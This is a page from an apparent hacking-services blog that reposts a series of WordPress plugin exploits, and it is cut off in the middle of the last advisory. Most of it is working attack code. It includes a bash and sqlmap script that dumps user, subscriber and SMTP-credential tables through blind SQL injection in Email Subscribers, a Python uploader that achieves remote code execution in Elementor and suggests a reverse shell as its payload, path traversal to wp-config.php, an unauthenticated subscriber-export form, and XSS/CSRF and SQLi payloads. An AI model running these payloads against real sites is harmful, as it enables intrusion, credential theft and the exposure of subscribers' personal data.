# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBA@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: <= 4.2.2
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-19985
################################################################################################
# ___ ___ ___ ___ ___ #
# /\ \ /\ \ /\ \ /\ \ /\ \ ___ #
# /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #
# /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #
# _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #
# /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #
# \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #
# \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #
# \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #
# \::/ / \::/ / \::/ / \:\__\ \/__/ #
# \/__/ \/__/ \/__/ \/__/ #
# ___ ___ ___ ___ #
# /\ \ /\ \ /\ \ /\ \ #
# /::\ \ /::\ \ /::\ \ /::\ \ #
# EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #
# Email Subscribers & Newsletters <= 4.2.2 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #
# Unauthenticated File Download /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #
# \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #
# \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #
# \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #
# \:\__\ \::/ / \:\__\ \:\__\ #
# KBAZ \/__/ \/__/ \/__/ \/__/ #
# #
# #
################################################################################################
curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141604
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBAZ@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: < 4.3.3
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-20361
# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361
main () {
header
if [ "$#" -ne 1 ]; then
echo "Usage : bash CVE-2019-20361.sh [BASE URL]"
echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/"
exit
fi
url=$1
echo ' Target URL : ' "$url"
echo ' Generating sqlmap tamper script in /tmp'
gen_sqlmap_tamper
sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3"
echo ' SQLMap base command : ' "$sqlmap_cmd"
while true
do
sleep 1
echo ''
echo " Possible choices: "
echo ''
echo " 0) Exit"
echo " 1) Simple vulnerability test SLEEP(5)"
echo " 2) Vulnerability test with SQLMap "
echo " 3) Get WP users data"
echo " 4) Get subscribers information"
echo " 5) Get 'Simple WP SMTP' settings"
echo ''
echo -n ' Choice number => '
read n
case $n in
0) exit ;;
1) echo 'Testing SLEEP(5)...'
{ time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;;
2) $sqlmap_cmd ;;
3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;;
4) $sqlmap_cmd -T wp_ig_contacts --dump ;;
5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;
*) echo "Invalid option" ;;
esac
done
}
header () {
echo ''
echo ' ################################################################################################';
echo ' # ___ ___ ___ ___ ___ #';
echo ' # /\ \ /\ \ /\ \ /\ \ /\ \ ___ #';
echo ' # /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #';
echo ' # /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #';
echo ' # _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #';
echo ' # /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #';
echo ' # \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #';
echo ' # \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #';
echo ' # \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #';
echo ' # \::/ / \::/ / \::/ / \:\__\ \/__/ #';
echo ' # \/__/ \/__/ \/__/ \/__/ #';
echo ' # ___ ___ ___ ___ #';
echo ' # /\ \ /\ \ /\ \ /\ \ #';
echo ' # /::\ \ /::\ \ /::\ \ /::\ \ #';
echo ' # EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #';
echo ' # Email Subscribers & Newsletters < 4.3.1 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #';
echo ' # Unauthenticated Blind SQL Injection /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #';
echo ' # \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #';
echo ' # \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #';
echo ' # \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #';
echo ' # \:\__\ \::/ / \:\__\ \:\__\ #';
echo ' # KBAZ \/__/ \/__/ \/__/ \/__/ #';
echo ' # #';
echo ' # #';
echo ' ################################################################################################';
echo ''
}
raw_commands () {
echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100" '","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' | base64 -w 0
{ time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable'
sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3
-T wp_users,wp_usermeta --dump
-T wp_ig_contacts --dump
--sql-query 'select * from wp_options where option_name="swpsmtp_options"'
}
gen_sqlmap_tamper () {
touch /tmp/__init__.py
cat << _END > /tmp/tamper_CVE-2019-1356989.py
#!/usr/bin/env python
import base64
import urllib
def tamper(payload, **kwargs):
#{"message_id":"100","campaign_id":"100","contact_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}
#INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'
param = '{"contact_id":"'
param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"
param += '","campaign_id":"100","message_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'
#print(param%payload)
return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '')
_END
}
main $@
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
# Google Dork:
# Date: 2018-01-23
# Exploit Author: ThreatPress Security
# Vendor Homepage: http://icegram.com/
# Software Link: https://wordpress.org/plugins/email-subscribers/
# Version: 3.4.7
# Tested on: WordPress 4.9.2
# CVE :
Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed
the vulnerability that allows an unauthenticated user to download the entire subscriber
list with names and e-mail addresses.
Exploit:
<form action="http://DOMAINTOTEST.com/?es=export" method="post">
<input type="text" name="option" value="view_all_subscribers" />
<input type="submit" value="Exploit" />
</form>
source: https://www.securityfocus.com/bid/53850/info
The Email Newsletter plugin for WordPress is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
An attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
Email Newsletter 8.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=registered_user
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=view_suscriber
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=commentposed _user
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=contact_user
# Exploit Title: WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/16/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://elementor.com/
# Software Link: https://wordpress.org/plugins/elementor/advanced/ (scroll down to select the version)
# Version: 3.6.0, 3.6.1, 3.62
# Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload)
#!/usr/bin/python
import requests
import re
# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid credentials. This exploit needs an account in order to work.
# # # # # VULNERABILITY DESCRIPTION # # # # #
# The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file.
# This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control)
# The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php
#
# At the end of this file you can find this code:
# add_action( 'admin_init', function() {
# if ( wp_doing_ajax() &&
# isset( $_POST['action'] ) &&
# isset( $_POST['_nonce'] ) &&
# wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY )
# ) {
# $this->maybe_handle_ajax();
# }
# } );
#
# This code is triggered whenever ANY user account visits /wp-admin
# In order to work we need the following 4 things:
# 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php
# 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file)
# 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in DoLogin function)
# 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file)
#
# The file we upload must have the following structure:
# 1. It must be a ZIP file. You can name it as you want.
# 2. It must contain a folder called "elementor-pro"
# 3. This folder must contain a file named "elementor-pro.php"# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
# 4. The payload must contain AT LEAST the plugin name, otherwise WordPress will NOT accept it and the upload will FAIL
# e.g.
# <?php
# /**
# * Plugin Name: Elementor Pro
# */
# // Actual PHP payload
# ?>
# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
#
# WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload.
# If it tries, for example, to connect to an offline host, it could lead to a Denial of Service.
# In order to prevent this, I suggest you to use some variable to activate the payload.
# Something like this (visit anypage.php?activate=1 in order to continue with the actual payload):
# if (!isset($_GET['activate']))
# return;
# Change the following 4 variables:
payloadFileName = 'elementor-pro.zip' # Change this with the path of the ZIP archive that contains your payload
baseUrl = 'http://192.168.56.103/wordpress/' # Change this with the base url of the target
username = 'guest' # Change this with the username you want to use to log in
password = 'test' # Change this with the password you want to use to log in
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
session = requests.Session()
cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' } # WordPress needs this to tell if browser can manage cookies
def DoLogin(username, password):
global cookies
loginUrl = baseUrl + 'wp-login.php'
adminUrl = baseUrl + 'wp-admin/'
data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 }
# search for: "ajax":{"url":"http:\/\/baseUrl\/wp-admin\/admin-ajax.php","nonce":"4e8878bdba"}
# 4e8878bdba is just an example of nonce. It can be anything else.
regexp = re.compile('"ajax":\\{"url":".+admin\\-ajax\\.php","nonce":"(.+)"\\}')
response = session.post(loginUrl, cookies=cookies, data=data)
search = regexp.search(response.text)
if not search:
# I've tested this on WordPress v. 5.9.3
# Fix the regexp if needed.
print('Error - Invalid credentials?')
#print(response.text)
else:
return search.group(1)
def UploadFile(fileName, nonce):
uploadUrl = baseUrl + 'wp-admin/admin-ajax.php'
data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce }
files = { 'fileToUpload' : open(fileName, 'rb') }
regexp = re.compile('"elementorProInstalled":true') # search for: "elementorProInstalled":true
response = session.post(uploadUrl, data=data, files=files)
search = regexp.search(response.text)
if not search:
# If Elemento Pro is already installed, the upload will fail.
# You can print the response to investigate further
print ('Error - Upload failed')
# print (response.text)
return False
else:
print ('Upload completed successfully!')
return True
# Define YOUR method to activate your payload (if needed)
def ActivatePayload():
payloadUrl = baseUrl + 'index.php?activate=1'
session.get(payloadUrl)
print('Trying to login...')
nonce = DoLogin(username, password)
print('Nonce found: ' + nonce)
print('Uploading payload...')
fileUploaded = UploadFile(payloadFileName, nonce)
# Define YOUR method to activate your payload (if needed)
if fileUploaded:
print ('Activating payload...')
ActivatePayload()
# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection
# Date: 28.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://elementor.com/
# Version: < 3.5.5
# Tested on: Google and Firefox latest version
# CVE : CVE-2022-4953
# 1. Description
The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.
# 2. Proof of Concept (PoC)
Proof of Concept:
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
source: https://www.securityfocus.com/bid/56479/info
The Eco-annu plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/eco-annu/map.php?eid=[SQL]
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or
properly parameterize the query to the database.
90 $wpdb->query(sprintf("UPDATE $mapsTable
91 SET PolyLines = '%s'
92 WHERE ID = '%s';", $PolyLines, $mapID));
.
.
.
163 $wpdb->query(sprintf("
164 UPDATE $mapsTable
165 SET TemplateID = '%s',
166 MapName = '%s',
167 Settings = '%s',
168 LastInvoked = CURRENT_TIMESTAMP,
169 CSSValues = '%s',
170 CSSValuesList = '%s',
171 CSSValuesHeading = '%s',
172 MapHTML = '%s',
173 IsActive = 1,
174 ThemeID = '%s'
175 WHERE ID = %s;",
176 $Items['mapTemplateName'],
177 $Items['mapName'],
178 urldecode($Items['mapSettingsXML']),
179 urldecode($Items["mapCSSXML"]),
180 urldecode($Items["listCSSXML"]),
181 urldecode($Items["headingCSSXML"]),
182 urldecode($Items["mapHTML"]),
183 $Items['mapThemeName'],
184 $mapID));
185 } else {
186
187 //this is a map insert
188 if (!$wpdb->query(sprintf("
189 INSERT INTO $mapsTable(
190 TemplateID,
191 MapName,
192 DefaultPinImage,
193 Settings,
194 LastInvoked,
195 PolyLines,
196 CSSValues,
197 CSSValuesList,
198 CSSValuesHeading,
199 MapHTML,
200 IsActive,
201 ThemeID
202 ) VALUES ('%s', '%s', '%s', '%s',
203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204 $Items['mapTemplateName'],
205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png",
206 urldecode($Items['mapSettingsXML']), '',
207 urldecode($Items["mapCSSXML"]),
208 urldecode($Items["listCSSXML"]),
209 urldecode($Items["headingCSSXML"]),
210 urldecode($Items["mapHTML"]),
211 $Items['mapThemeName'])))
.
.
267 $wpdb->query(sprintf("
268 UPDATE $mapsTable
269 SET MapName = '%s',
270 LastInvoked = CURRENT_TIMESTAMP,
271 IsActive = 1
272 WHERE ID = %s;", $mapName, $mapID));
In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory:
4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12
13 if (!file_exists($imagesDirectory)) {
14 mkdir($imagesDirectory);
15 }
CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:
Exploit Code:
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3
# Exploit Title: Wordpress Plugins Easy Testimonials 3.2 - Cross-Site Scripting
# Date: 2018-11-23
# Exploit Author: En_dust
# Vendor Homepage: https://wordpress.org/plugins/easy-testimonials/
# Software Link: https://wordpress.org/plugins/easy-testimonials/
# Version: 3.2
# CVE : N/A
# Tested on: Windows 10 x64
# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins easy testimonials 3.2.
# Three parameters(_ikcf_client _ikcf_position _ikcf_other) have Cross-Site Scripting.
# POC
# XSS Stored
POST http://localhost/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2152
Referer: http://localhost/wp-admin/post-new.php?post_type=testimonial&wp-post-new-reload=true
Cookie: wp-saving-post=25-check; wp-saving-post=22-saved; wordpress_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C481919de475c08441e455ffe01f4b8a241ea13f3a4255be476841ddc281597bc; wp-settings-time-1=1542959022; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26posts_list_mode%3Dexcerpt; PHPSESSID=au6fo2rac6sn2hgk0mnniq17k2; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C9bce6802e21d94bc37ab3eabf8dfe2950603d327e32a8ad14e167b4550d036dc
Connection: keep-alive
Upgrade-Insecure-Requests: 1
_wpnonce=b3ca69b020&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=testimonial&original_post_status=auto-draft&referredby=&_wp_original_http_referer=&auto_draft=&post_ID=25&meta-box-order-nonce=c25a6e37b2&closedpostboxesnonce=4784cc9ba9&post_title=test&samplepermalinknonce=f39f8eec26&content=test&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&aa=2018&mm=11&jj=23&hh=17&mn=12&ss=56&hidden_mm=11&cur_mm=11&hidden_jj=23&cur_jj=23&hidden_aa=2018&cur_aa=2018&hidden_hh=17&cur_hh=17&hidden_mn=12&cur_mn=12&original_publish=%E5%8F%91%E5%B8%83&publish=%E5%8F%91%E5%B8%83&tax_input%5Beasy-testimonial-category%5D%5B%5D=0&neweasy-testimonial-category=%E6%96%B0%E5%88%86%E7%B1%BB%E7%9B%AE%E5%BD%95%E5%90%8D&neweasy-testimonial-category_parent=-1&_ajax_nonce-add-easy-testimonial-category=50d8975094&my-custom-fields_wpnonce=b074ff3409&_ikcf_client=[XSS]&_ikcf_email=test%40test.com&_ikcf_position=[XSS]&_ikcf_other=[XSS]&_ikcf_rating=1&excerpt=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=81df7811e1&post_name=&post_grid_post_settings_input_nonce=95c656b2da&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&post_grid_post_settings%5Bpost_skin%5D=flat&post_grid_post_settings%5Bcustom_thumb_source%5D=http%3A%2F%2Fwww.wordpress.com%2Fwp-content%2Fplugins%2Fpost-grid%2Fassets%2Ffrontend%2Fcss%2Fimages%2Fplaceholder.png&post_grid_post_settings%5Bfont_awesome_icon%5D=&post_grid_post_settings%5Bfont_awesome_icon_color%5D=737272&post_grid_post_settings%5Bfont_awesome_icon_size%5D=50px&post_grid_post_settings%5Bcustom_youtube_id%5D=&post_grid_post_settings%5Bcustom_vimeo_id%5D=&post_grid_post_settings%5Bcustom_dailymotion_id%5D=&post_grid_post_settings%5Bcustom_mp3_url%5D=&post_grid_post_settings%5Bcustom_soundcloud_id%5D=
====================================================
Product: Easy Social Icons WordPress plugin
Vendor: CyberNetikz
Tested Version: 1.2.2
Vulnerability Type: XSS [CWE-79] and CSRF [CWE-352]
Risk Level: Medium
Solution Status: Solved in version 1.2.3
Discovered and Provided: Eric Flokstra - ITsec Security Services
====================================================
[-] About the Vendor:
Easy Social Icons is a WordPress plugin and can be used to set icons on the public page in order to link to social media platforms such as LinkedIn, Twitter or Facebook.
[-] Advisory Details:
It is discovered that insufficient validation is performed on the 'image_file' parameter enabling arbitrary JavaScript to be injected. On top of that no random tokens are used to prevent CSRF attacks. By combining these vulnerabilities an attacker could for example trick an admin into setting a persistent XSS payload on the public WordPress page.
[-] Proof of Concept:
<html>
<body>
<form action="http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1" <http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1> method="POST" enctype="multipart/form-data">
<input type="hidden" name="title" value="Example" />
<input type="hidden" name="image_file" value="http://10.0.2.215/wordpress/wp-content/uploads/2015/02/cookie.jpg"><script>alert(1)</script>" />
<input type="hidden" name="url" value="http://www.example.org" />
<input type="hidden" name="sortorder" value="0" />
<input type="hidden" name="target" value="1" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="submit_button" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
[-] Disclosure Timeline:
[02 Feb 2015]: Vendor notification
[02 Feb 2015]: Vulnerability confirmation
[11 Feb 2015]: Vulnerability patched
[19 Feb 2015]: Public disclosure
[-] Solution:
Update to the latest version of Easy Social Icons.
[-] References:
[1] Easy Social Icons Changelog -- https://wordpress.org/plugins/easy-social-icons/changelog/
[2] Common Weakness Enumeration (CWE) -- http://cwe.mitre.org
[3] ITsec Security Services BV -- http://www.itsec.nl
------------------------------------------------------------------------
ITsec Security Services bv. (KvK. 34181927)
Postal Address:
P.O. Box 5120, 2000GC Haarlem
Visitors Address:
Kenaupark 23, 2011 MR Haarlem
Phone: +31 - (0)23 542 05 78
The information contained in this email communication is confidential and is intended solely for the use of the individual or entity to whom it is addressed and others authorized to receive it. If you are not the intended recipient, you are hereby notified that any disclosure, copying,distribution, or taking any action in reliance of the contents of this information is strictly prohibited and may be unlawful. No rights may be attached to this message. ITsec does not accept any liability for incorrect and incomplete transmission or delayed receipt of this e-mail nor for the effects or damages caused by the direct or indirect use of the information or functionality provided by this posting, nor the content contained within.Use them at your own risk.
DefenseCode ThunderScan SAST Advisory
WordPress Easy Modal Plugin
Multiple Security Vulnerabilities
Advisory ID: DC-2017-01-007
Advisory Title: WordPress Easy Modal Plugin Multiple Vulnerabilities
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Easy Modal plugin
Language: PHP
Version: 2.0.17 and below
Vendor Status: Vendor contacted, update released
Release Date: 2017/08/07
Risk: Medium
1. General Overview
===================
During the security audit of Easy Modal plugin for WordPress CMS,
multiple vulnerabilities were discovered using DefenseCode ThunderScan
application source code security analysis platform.
More information about ThunderScan is available at URL:
http://www.defensecode.com
2. Software Overview
====================
According to the plugin developers, Easy Modal is the #1 WordPress
Popup Plugin. It's advertised as "Make glorious & powerful popups and
market your content like never before - all in minutes!".
According to wordpress.org, it has more than 20,000 active installs.
Homepage:
http://wordpress.org/extend/plugins/easy-modal/
https://easy-modal.com
3. Vulnerability Description
============================
During the security analysis, ThunderScan discovered SQL injection
vulnerabilities in Easy Modal WordPress plugin.
The easiest way to reproduce the vulnerability is to visit the
provided URL while being logged in as administrator or another user
that is authorized to access the plugin settings page. Users that do
not have full administrative privileges could abuse the database
access the vulnerability provides to either escalate their privileges
or obtain and modify database contents they were not supposed to be
able to.
The nonce token is required as the URL parameter. Token value is not
unique for each request, nor per each URL, so if the attacker manages
to obtain a valid token value, the module could be exposed to attack
vectors such as Cross Site request forgery (CSRF).
3.1. SQL injection
Function: $wpdb->query()
Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
Sample URL:
http://vulnerablesite.com/wp-admin/admin.php?page=easy-modal&action=dele
te&id%5B0%5D=4%20AND%20SLEEP(5)&easy-modal_nonce=xxx
File: easy-modal\classes\controller\admin\modals.php
---------
93 $ids = is_array($_GET['id']) ? $_GET['id'] :
array($_GET['id']);
...
97 $ids = $_GET['ids'];
...
101 $ids = $_GET['modal'];
...
110 $wpdb->query("UPDATE {$wpdb->prefix}em_modals SET
is_trash = 1 WHERE id IN (".implode(',', $ids).")");
---------
3.2. SQL injection
Function: $wpdb->query()
Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
Sample URL:
http://vulnerablesite.com/wp-admin/admin.php?easy-modal_nonce=xxx&_wp_ht
tp_referer=%2Fvulnerablesite.com%2Fwp-admin%2Fadmin.php%3Fpage%3Deasy-mo
dal%26status%3Dtrash&page=easy-modal&action=untrash&paged=1&id[]=2)%20AN
D%20SLEEP(10)--%20ZpVQ&action2=-1
File: easy-modal\classes\controller\admin\modals.php
---------
123 $ids = is_array($_GET['id']) ? $_GET['id'] :
array($_GET['id']);
...
127 $ids = $_GET['ids'];
...
131 $ids = $_GET['modal'];
...
140 $wpdb->query("UPDATE {$wpdb->prefix}em_modals SET
